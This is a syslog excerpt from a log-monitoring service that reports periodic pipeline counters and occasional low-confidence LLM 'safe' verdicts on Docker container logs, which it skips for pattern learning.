Mar 20 05:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:31.935318 [observer] Pipeline: processed=1957 pattern_hits=1923 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:31.935345 [observer] Patterns: hash=1923 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:01.959556 [observer] Pipeline: processed=1961 pattern_hits=1927 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:01.959581 [observer] Patterns: hash=1927 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:31.943855 [observer] Pipeline: processed=1963 pattern_hits=1929 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:26:31.943884 [observer] Patterns: hash=1929 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:01.960261 [observer] Pipeline: processed=1967 pattern_hits=1933 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:01.960836 [observer] Patterns: hash=1933 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:31.944279 [observer] Pipeline: processed=1969 pattern_hits=1935 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:27:31.944306 [observer] Patterns: hash=1935 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:01.996692 [observer] Pipeline: processed=1975 pattern_hits=1941 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:01.998378 [observer] Patterns: hash=1941 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:31.934940 [observer] Pipeline: processed=1977 pattern_hits=1943 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:28:31.934970 [observer] Patterns: hash=1943 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:01.958913 [observer] Pipeline: processed=1979 pattern_hits=1945 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:01.958942 [observer] Patterns: hash=1945 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:31.933581 [observer] Pipeline: processed=1983 pattern_hits=1949 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:29:31.933605 [observer] Patterns: hash=1949 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:01.958466 [observer] Pipeline: processed=1985 pattern_hits=1951 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:01.958501 [observer] Patterns: hash=1951 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:31.938569 [observer] Pipeline: processed=1989 pattern_hits=1955 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:30:31.938595 [observer] Patterns: hash=1955 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:01.952744 [observer] Pipeline: processed=1991 pattern_hits=1957 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:01.952781 [observer] Patterns: hash=1957 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:31.933872 [observer] Pipeline: processed=1995 pattern_hits=1961 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:31:31.933894 [observer] Patterns: hash=1961 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:01.940516 [observer] Pipeline: processed=1997 pattern_hits=1963 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:01.940554 [observer] Patterns: hash=1963 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:31.943709 [observer] Pipeline: processed=1999 pattern_hits=1965 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:32:31.943737 [observer] Patterns: hash=1965 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:01.960705 [observer] Pipeline: processed=2005 pattern_hits=1971 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:01.960759 [observer] Patterns: hash=1971 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:31.940875 [observer] Pipeline: processed=2007 pattern_hits=1973 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:33:31.940902 [observer] Patterns: hash=1973 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:01.955223 [observer] Pipeline: processed=2011 pattern_hits=1977 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:01.955285 [observer] Patterns: hash=1977 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:31.933888 [observer] Pipeline: processed=2013 pattern_hits=1979 llm_calls=34 llm_errors=0 learned=0
Mar 20 05:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:31.934010 [observer] Patterns: hash=1979 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=34
Mar 20 05:34:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:49.322635 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.68 action=allow pattern_type=prefix
Mar 20 05:34:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:49.322683 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 05:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:56.986659 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 05:34:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:34:56.986696 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.874026 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.874067 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.937078 [observer] Pipeline: processed=2020 pattern_hits=1983 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:01.937106 [observer] Patterns: hash=1983 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:31.935648 [observer] Pipeline: processed=2022 pattern_hits=1985 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:35:31.935674 [observer] Patterns: hash=1985 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:01.940295 [observer] Pipeline: processed=2024 pattern_hits=1987 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:01.940322 [observer] Patterns: hash=1987 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:31.934233 [observer] Pipeline: processed=2028 pattern_hits=1991 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:36:31.934260 [observer] Patterns: hash=1991 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:01.957334 [observer] Pipeline: processed=2030 pattern_hits=1993 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:01.957434 [observer] Patterns: hash=1993 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:31.935343 [observer] Pipeline: processed=2034 pattern_hits=1997 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:37:31.935367 [observer] Patterns: hash=1997 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:01.947432 [observer] Pipeline: processed=2036 pattern_hits=1999 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:01.947468 [observer] Patterns: hash=1999 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:31.933614 [observer] Pipeline: processed=2042 pattern_hits=2005 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:38:31.933638 [observer] Patterns: hash=2005 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:01.999510 [observer] Pipeline: processed=2044 pattern_hits=2007 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:01.999741 [observer] Patterns: hash=2007 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:31.941782 [observer] Pipeline: processed=2046 pattern_hits=2009 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:39:31.941808 [observer] Patterns: hash=2009 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:01.936966 [observer] Pipeline: processed=2050 pattern_hits=2013 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:01.936994 [observer] Patterns: hash=2013 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:31.935613 [observer] Pipeline: processed=2052 pattern_hits=2015 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:40:31.935645 [observer] Patterns: hash=2015 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:01.959014 [observer] Pipeline: processed=2056 pattern_hits=2019 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:01.959142 [observer] Patterns: hash=2019 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:31.943457 [observer] Pipeline: processed=2058 pattern_hits=2021 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:41:31.943480 [observer] Patterns: hash=2021 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:01.969182 [observer] Pipeline: processed=2062 pattern_hits=2025 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:01.969224 [observer] Patterns: hash=2025 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:31.943292 [observer] Pipeline: processed=2064 pattern_hits=2027 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:42:31.943316 [observer] Patterns: hash=2027 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:01.989001 [observer] Pipeline: processed=2066 pattern_hits=2029 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:01.989209 [observer] Patterns: hash=2029 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:31.939303 [observer] Pipeline: processed=2072 pattern_hits=2035 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:43:31.939326 [observer] Patterns: hash=2035 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:01.944121 [observer] Pipeline: processed=2074 pattern_hits=2037 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:01.944355 [observer] Patterns: hash=2037 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:31.936498 [observer] Pipeline: processed=2078 pattern_hits=2041 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:44:31.936521 [observer] Patterns: hash=2041 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:01.956066 [observer] Pipeline: processed=2080 pattern_hits=2043 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:01.956095 [observer] Patterns: hash=2043 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:31.935065 [observer] Pipeline: processed=2084 pattern_hits=2047 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:45:31.935094 [observer] Patterns: hash=2047 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:01.951291 [observer] Pipeline: processed=2086 pattern_hits=2049 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:01.951320 [observer] Patterns: hash=2049 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:31.951376 [observer] Pipeline: processed=2088 pattern_hits=2051 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:46:31.951399 [observer] Patterns: hash=2051 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:01.946701 [observer] Pipeline: processed=2092 pattern_hits=2055 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:01.946735 [observer] Patterns: hash=2055 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:31.939225 [observer] Pipeline: processed=2094 pattern_hits=2057 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:47:31.939248 [observer] Patterns: hash=2057 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:01.948817 [observer] Pipeline: processed=2098 pattern_hits=2061 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:01.948843 [observer] Patterns: hash=2061 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:31.933737 [observer] Pipeline: processed=2102 pattern_hits=2065 llm_calls=37 llm_errors=0 learned=0
Mar 20 05:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:31.933761 [observer] Patterns: hash=2065 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=37
Mar 20 05:48:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:50.483014 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 05:48:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:50.483053 [analyzer] Source hint mismatch: LLM says "nginx-access", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 05:48:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:57.535910 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 05:48:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:48:57.535948 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 05:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:01.943244 [observer] Pipeline: processed=2148 pattern_hits=2109 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:01.943270 [observer] Patterns: hash=2109 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:31.941403 [observer] Pipeline: processed=2152 pattern_hits=2113 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:49:31.941425 [observer] Patterns: hash=2113 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:01.950792 [observer] Pipeline: processed=2154 pattern_hits=2115 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:01.950825 [observer] Patterns: hash=2115 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:31.937139 [observer] Pipeline: processed=2158 pattern_hits=2119 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:50:31.937197 [observer] Patterns: hash=2119 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:01.944999 [observer] Pipeline: processed=2160 pattern_hits=2121 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:01.945769 [observer] Patterns: hash=2121 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:31.933994 [observer] Pipeline: processed=2164 pattern_hits=2125 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:51:31.934019 [observer] Patterns: hash=2125 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:01.952288 [observer] Pipeline: processed=2166 pattern_hits=2127 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:01.952327 [observer] Patterns: hash=2127 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:31.935870 [observer] Pipeline: processed=2170 pattern_hits=2131 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:52:31.935896 [observer] Patterns: hash=2131 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:01.958260 [observer] Pipeline: processed=2172 pattern_hits=2133 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:01.958427 [observer] Patterns: hash=2133 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:31.941630 [observer] Pipeline: processed=2176 pattern_hits=2137 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:53:31.941659 [observer] Patterns: hash=2137 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:01.942587 [observer] Pipeline: processed=2180 pattern_hits=2141 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:01.942617 [observer] Patterns: hash=2141 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:31.933696 [observer] Pipeline: processed=2182 pattern_hits=2143 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:54:31.933720 [observer] Patterns: hash=2143 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:01.937552 [observer] Pipeline: processed=2186 pattern_hits=2147 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:01.937578 [observer] Patterns: hash=2147 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:31.944050 [observer] Pipeline: processed=2188 pattern_hits=2149 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:55:31.944078 [observer] Patterns: hash=2149 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:01.971047 [observer] Pipeline: processed=2192 pattern_hits=2153 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:01.972905 [observer] Patterns: hash=2153 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:31.943064 [observer] Pipeline: processed=2194 pattern_hits=2155 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:56:31.943091 [observer] Patterns: hash=2155 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:01.950601 [observer] Pipeline: processed=2196 pattern_hits=2157 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:01.950633 [observer] Patterns: hash=2157 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:31.933890 [observer] Pipeline: processed=2200 pattern_hits=2161 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:57:31.933964 [observer] Patterns: hash=2161 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:01.946298 [observer] Pipeline: processed=2202 pattern_hits=2163 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:01.946335 [observer] Patterns: hash=2163 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:31.933786 [observer] Pipeline: processed=2208 pattern_hits=2169 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:58:31.933833 [observer] Patterns: hash=2169 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:01.950862 [observer] Pipeline: processed=2210 pattern_hits=2171 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:01.950893 [observer] Patterns: hash=2171 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:31.935038 [observer] Pipeline: processed=2214 pattern_hits=2175 llm_calls=39 llm_errors=0 learned=0
Mar 20 05:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:31.935064 [observer] Patterns: hash=2175 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=39
Mar 20 05:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:43.872259 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 05:59:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:43.872303 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 05:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:48.539308 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=contains
Mar 20 05:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:48.539337 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 05:59:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:54.411019 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
